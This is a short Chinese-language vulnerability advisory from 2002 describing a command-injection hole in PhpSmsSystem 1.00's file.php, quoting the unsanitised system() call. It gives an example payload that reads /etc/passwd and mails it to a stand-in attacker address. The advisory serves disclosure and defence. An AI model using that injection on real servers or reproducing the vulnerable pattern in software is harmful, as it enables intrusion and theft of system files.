PhpSmsSend存在任意命令可执行漏洞发布时间:2002-01-30 更新时间:2002-01-30 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 PhpSmsSystem Version 1.00详细描述 PhpSmsSystem是SmsSend应用程序的前端程序,可以发送SMS信息,具体可以参考 如下站点:http://zekiller.skytech.org/smssend.php。 其中file.php脚本存在漏洞,可以导致任意命令可执行: $str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY; system($str,$res); 如果系统包含"`"字符,就会导致执行后续命令,不过命令字符必须少于160个 字符。可以使用cat /etc/passwd|mail evil@hacker.com操作获得密码信息。 测试代码 见描述 解决方案 尚无 相关信息 Indra Kusuma (indra@kusuma.or.id) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-01/0353.html |
